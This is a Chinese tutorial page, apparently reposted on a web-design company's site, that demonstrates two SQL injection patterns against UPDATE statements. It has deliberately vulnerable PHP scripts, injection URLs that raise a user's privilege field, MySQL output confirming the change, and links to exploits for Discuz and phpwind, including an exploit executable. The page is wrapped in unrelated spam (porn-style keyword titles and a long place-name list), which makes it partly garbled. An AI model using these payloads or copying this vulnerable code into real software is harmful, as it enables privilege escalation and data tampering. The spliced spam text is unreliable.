1. <ul id="0c1fb"></ul>

      <noscript id="0c1fb"><video id="0c1fb"></video></noscript>
      <noscript id="0c1fb"><listing id="0c1fb"><thead id="0c1fb"></thead></listing></noscript>

      99热在线精品一区二区三区_国产伦精品一区二区三区女破破_亚洲一区二区三区无码_精品国产欧美日韩另类一区

      RELATEED CONSULTING
      相關(guān)咨詢
      選擇下列產(chǎn)品馬上在線溝通
      服務(wù)時(shí)間:8:30-17:00
      你可能遇到了下面的問(wèn)題
      關(guān)閉右側(cè)工具欄

      新聞中心

      這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
      UPDATE注射的兩個(gè)模式是什么

      今天就跟大家聊聊有關(guān)UPDATE注射的兩個(gè)模式是什么,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

      公司主營(yíng)業(yè)務(wù):成都做網(wǎng)站、網(wǎng)站設(shè)計(jì)、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競(jìng)爭(zhēng)能力。成都創(chuàng)新互聯(lián)公司是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對(duì)我們的高要求,感謝他們從不同領(lǐng)域給我們帶來(lái)的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來(lái)驚喜。成都創(chuàng)新互聯(lián)公司推出如皋免費(fèi)做網(wǎng)站回饋大家。

      一.測(cè)試環(huán)境:

      OS: Windowsxp sp2

      php: php 4.3.10 (

      MySQL 4.1.9

      apache 1.3.33 

      二.測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu):

      ----start---

      -- 數(shù)據(jù)庫(kù): `test`

      -- 

      -- --------------------------------------------------------

      -- 

      -- 表的結(jié)構(gòu) `userinfo`

      -- 

      CREATE TABLE `userinfo` (

      `groudid` varchar(12) NOT NULL default ’1’,

      `user` varchar(12) NOT NULL default ’heige’,

      `pass` varchar(122) NOT NULL default ’123456’

      ) ENGINE=MyISAM DEFAULT CHARSET=latin1;

      -- 

      -- 導(dǎo)出表中的數(shù)據(jù) `userinfo`

      -- 

      INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

      ------end-------

      三.測(cè)試模式:

      1,變量沒有帶’’或""[MOD1]

      //test1.php Mod1

      $servername = "localhost";

      $dbusername = "root";

      $dbpassword = "";

      $dbname = "test";

      mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

      $sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號(hào)

      $result = mysql_db_query($dbname, $sql);

      $userinfo = mysql_fetch_array($result);

      echo "

      SQL Query:$sql

      ";

      ?>

      腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權(quán)限等級(jí),我們的目的就是通過(guò)構(gòu)造$p 來(lái)達(dá)

      到修改groupid的目的:

      那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

      在mysql里查詢: mysql> select * from userinfo;

      +---------+-------+--------+

      | groudid | user | pass  |

      +---------+-------+--------+

      | 1    | heige | 123456 |

      +---------+-------+--------+

      1 row in set (0.01 sec)

      用戶heige的groudid又2改為1了 :)

      所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個(gè)就是我們的模式1。

      2,變量帶’’或""[MOD2]

      ?php

      //test2.php

      $servername = "localhost";

      $dbusername = "root";

      $dbpassword = "";

      $dbname = "test";

      mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

      $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)

      $result = mysql_db_query($dbname, $sql);

      $userinfo = mysql_fetch_array($result);

      echo "

      SQL Query:$sql

      ";

      ?>

      為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:

      http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’

      提交的語(yǔ)句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

      mysql查詢:

      mysql> select * from userinfo;

      +---------+-------+--------------------+

      | groudid | user | pass        |

      +---------+-------+--------------------+

      | 2    | heige | 123456’,groudid=’1 |

      +---------+-------+--------------------+

      1 row in set (0.00 sec)

      groudid并沒有被修改。那么在變量被’’或""時(shí) 就完全沒有被注射呢?不是 下面我們看模式2:

      //test3.php Mod2

      $servername = "localhost";

      $dbusername = "root";

      $dbpassword = "";

      $dbname = "test";

      mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

      $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)

      $result = mysql_db_query($dbname, $sql);

      mysql_fetch_array($result);  //$p的數(shù)據(jù)寫入數(shù)據(jù)庫(kù)

      $sql= "select pass from userinfo where user=’heige’"; 

      $result = mysql_db_query($dbname, $sql);

      $userinfo=mysql_fetch_array($result); 

      echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

      $sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

      $result = mysql_db_query($dbname, $sql);

      mysql_fetch_array($result); //把$userinfo[0] 再次update

      ?>

      我們測(cè)試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

      回mysql查詢下 : mysql> select * from userinfo;

      +---------+-------+--------+

      | groudid | user | pass  |

      +---------+-------+--------+

      | 1    | heige | 123456 |

      +---------+-------+--------+

      1 row in set (0.00 sec)

      HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡(jiǎn)單的描敘如下:

      update-->select-->update

      四.實(shí)際模式

      模式1:Discuz 2.0/2.2 register.php 注射 

      漏洞分析:http://4ngel.net/article/41.htm

      Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

      模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞 

       漏洞分析:

      update (profile.php 注射變量為$proicon update語(yǔ)句里為,icon=’$userdb[icon]’)

      |

      v

      select (jop.php)

      |

      v

      updtate (jop.php)

      Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

      看完上述內(nèi)容,你們對(duì)UPDATE注射的兩個(gè)模式是什么有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。


      當(dāng)前文章:UPDATE注射的兩個(gè)模式是什么
      轉(zhuǎn)載注明:http://ef60e0e.cn/article/gdgssd.html
      99热在线精品一区二区三区_国产伦精品一区二区三区女破破_亚洲一区二区三区无码_精品国产欧美日韩另类一区
      1. <ul id="0c1fb"></ul>

        <noscript id="0c1fb"><video id="0c1fb"></video></noscript>
        <noscript id="0c1fb"><listing id="0c1fb"><thead id="0c1fb"></thead></listing></noscript>

        保定市| 孝昌县| 阿拉善左旗| 温宿县| 应用必备| 平利县| 霍林郭勒市| 长治县| 从化市| 弥渡县| 定兴县| 清水河县| 筠连县| 大安市| 罗城| 清水县| 东港市| 舟曲县| 涞水县| 郑州市| 娱乐| 沙洋县| 上饶市| 遵化市| 乌什县| 拜城县| 定日县| 延长县| 永春县| 仙游县| 锡林郭勒盟| 遂宁市| 汉源县| 蒙阴县| 岳西县| 色达县| 庆云县| 太保市| 乐昌市| 武山县| 长岭县|